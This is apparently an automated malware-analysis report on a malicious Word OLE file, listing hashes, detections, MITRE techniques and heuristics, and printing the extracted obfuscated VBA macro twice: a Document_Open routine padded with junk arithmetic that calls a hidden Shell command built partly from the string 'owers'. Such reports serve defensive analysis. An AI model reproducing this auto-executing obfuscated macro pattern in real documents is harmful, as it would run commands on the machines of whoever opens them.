Office (OLE) malware analysis — malicious · b29091e1dfdda47c

MALICIOUS

Office (OLE)

101.0 KB Created: 2018-06-15 19:27:00 Authoring application: Microsoft Office Word First seen: 2019-04-18

MD5: 712fbc52ac8b1a9e887fef6c2519ec14 SHA-1: 33fff0a2184ed6757b42cb6f5b9dd6d1c4cc0611 SHA-256: b29091e1dfdda47cc3d21f565816a16ead7e099c38566b1972d896963a9fc1cc

262 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious OLE document containing a VBA macro. The 'Document_Open' macro triggers a 'Shell()' call, which is a critical finding indicating the execution of arbitrary commands. This macro is designed to download and execute a second-stage payload, as suggested by the ClamAV detection name 'Doc.Malware.Valyria-6874636-0'. The VBA code is heavily obfuscated, but the intent to execute an external command is clear.

Heuristics 7

ClamAV: Doc.Malware.Valyria-6874636-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-6874636-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 103,424 bytes but its declared streams total only 57,355 bytes — 46,069 bytes (45%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2115 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2115 bytes
SHA-256: `2437dade82b90d9b3ad727575d7dee1cc4bf8ce10624f7e70ee48689b8c8b122`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "WnhUMPbktu" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function huQWaidES() On Error Resume Next AqNrEU = 10958 + HISku qdViX = (26648 * Sgn(buWhGP) / 95749 / OvHwCH * FFOZi + ChrW(RGGmFn) / imnMj * CInt(VhjiE)) wbDMLX = QZGlRP XNsqf = Rnd(rIRZw) wjrJo = 32268 + AbkTcI RtimGW = (43905 * Sgn(wMLtP) / 67360 / jOziD * ENXtzp + ChrW(iDaCt) / dHzwMF * CInt(hTnboI)) QzmhYa = QfQHu wSKLd = Rnd(MJaYQ) ftlIz = 53836 + wjPmc sQbqF = (10833 * Sgn(VBaBS) / 77357 / mIACdw * ubFKn + ChrW(kNhHa) / wjoVsJ * CInt(EwzLYd)) AlavF = zCzlKd FkRQZr = Rnd(MfGsHh) pnITS = 52299 + qzzmIs wVlzzM = (83030 * Sgn(Rofszq) / 51458 / MHork * zDZowv + ChrW(Noivho) / MwnvB * CInt(aoPXk)) rcvQhh = GZTkX JKuzj = Rnd(hcwpWj) huQWaidES = HOzfXt + VBA.Shell(vnBsN + Chr(DuqCroSPz + vbKeyP + vVztTjhcZs) + "owers" + QomLwriF + jKuBhYc + DoPRzTDjiBz + DhYpTKZc + NNIZaCuJqJP, 1837 - 1837) vJDzz = 94368 + CFzOT OYfziY = (57193 * Sgn(GuXoSa) / 39490 / puwsCq * uJtZFF + ChrW(VCWJir) / GVqpK * CInt(mrWVak)) pjOLnB = IzoBc vuMMvj = Rnd(JVhaK) dKZVS = 15701 + cRjYIC KwlQk = (82689 * Sgn(hYMWE) / 26305 / HCaVuh * QEiCMA + ChrW(sYwVf) / ijfSoR * CInt(KidjiK)) HqCmYw = klbzm JuCkk = Rnd(vlpkz) End Function Private Sub Document_open() On Error Resume Next qOozO = 2083 + izaWI QaBopc = (8497 * Sgn(bXViP) / 59887 / fQnLD * cJwMQ + ChrW(tVFYi) / VlwcLl * CInt(DRBYMw)) cwihbC = CkpKN NiLFF = Rnd(jurDO) bKuVw = 82105 + tuJCEB jbBzh = (49013 * Sgn(LSsXjZ) / 42397 / RcCUP * jLMMj + ChrW(NVzdu) / cKVswc * CInt(UqzGku)) zHakl = Edhzl XLWTC = Rnd(KUnRDb) huQWaidES HWqUP = 54100 + wLfZjZ MHKGD = (22329 * Sgn(VwzfrI) / 93607 / DjMUF * cLSKMS + ChrW(FUIXRL) / pBZWUw * CInt(vKBNT)) uKjEcS = CBiwz PMmAf = Rnd(WVzPpk) wPdrHZ = 92870 + YCHqz jBtJd = (62353 * Sgn(BGSTtn) / 45402 / ivNfc * LDvawz + ChrW(aHdEMz) / KftdJ * CInt(GKOjX)) RjARz = wWHAmv HwUVc = Rnd(cjwrvq) End Sub

SHA-256: 2437dade82b90d9b3ad727575d7dee1cc4bf8ce10624f7e70ee48689b8c8b122

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "WnhUMPbktu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function huQWaidES()
On Error Resume Next
AqNrEU = 10958 + HISku
qdViX = (26648 * Sgn(buWhGP) / 95749 / OvHwCH * FFOZi + ChrW(RGGmFn) / imnMj * CInt(VhjiE))
wbDMLX = QZGlRP
XNsqf = Rnd(rIRZw)
wjrJo = 32268 + AbkTcI
RtimGW = (43905 * Sgn(wMLtP) / 67360 / jOziD * ENXtzp + ChrW(iDaCt) / dHzwMF * CInt(hTnboI))
QzmhYa = QfQHu
wSKLd = Rnd(MJaYQ)
ftlIz = 53836 + wjPmc
sQbqF = (10833 * Sgn(VBaBS) / 77357 / mIACdw * ubFKn + ChrW(kNhHa) / wjoVsJ * CInt(EwzLYd))
AlavF = zCzlKd
FkRQZr = Rnd(MfGsHh)
pnITS = 52299 + qzzmIs
wVlzzM = (83030 * Sgn(Rofszq) / 51458 / MHork * zDZowv + ChrW(Noivho) / MwnvB * CInt(aoPXk))
rcvQhh = GZTkX
JKuzj = Rnd(hcwpWj)
huQWaidES = HOzfXt + VBA.Shell(vnBsN + Chr(DuqCroSPz + vbKeyP + vVztTjhcZs) + "owers" + QomLwriF + jKuBhYc + DoPRzTDjiBz + DhYpTKZc + NNIZaCuJqJP, 1837 - 1837)
vJDzz = 94368 + CFzOT
OYfziY = (57193 * Sgn(GuXoSa) / 39490 / puwsCq * uJtZFF + ChrW(VCWJir) / GVqpK * CInt(mrWVak))
pjOLnB = IzoBc
vuMMvj = Rnd(JVhaK)
dKZVS = 15701 + cRjYIC
KwlQk = (82689 * Sgn(hYMWE) / 26305 / HCaVuh * QEiCMA + ChrW(sYwVf) / ijfSoR * CInt(KidjiK))
HqCmYw = klbzm
JuCkk = Rnd(vlpkz)
End Function
Private Sub Document_open()
On Error Resume Next
qOozO = 2083 + izaWI
QaBopc = (8497 * Sgn(bXViP) / 59887 / fQnLD * cJwMQ + ChrW(tVFYi) / VlwcLl * CInt(DRBYMw))
cwihbC = CkpKN
NiLFF = Rnd(jurDO)
bKuVw = 82105 + tuJCEB
jbBzh = (49013 * Sgn(LSsXjZ) / 42397 / RcCUP * jLMMj + ChrW(NVzdu) / cKVswc * CInt(UqzGku))
zHakl = Edhzl
XLWTC = Rnd(KUnRDb)
huQWaidES
HWqUP = 54100 + wLfZjZ
MHKGD = (22329 * Sgn(VwzfrI) / 93607 / DjMUF * cLSKMS + ChrW(FUIXRL) / pBZWUw * CInt(vKBNT))
uKjEcS = CBiwz
PMmAf = Rnd(WVzPpk)
wPdrHZ = 92870 + YCHqz
jBtJd = (62353 * Sgn(BGSTtn) / 45402 / ivNfc * LDvawz + ChrW(aHdEMz) / KftdJ * CInt(GKOjX))
RjARz = wWHAmv
HwUVc = Rnd(cjwrvq)
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.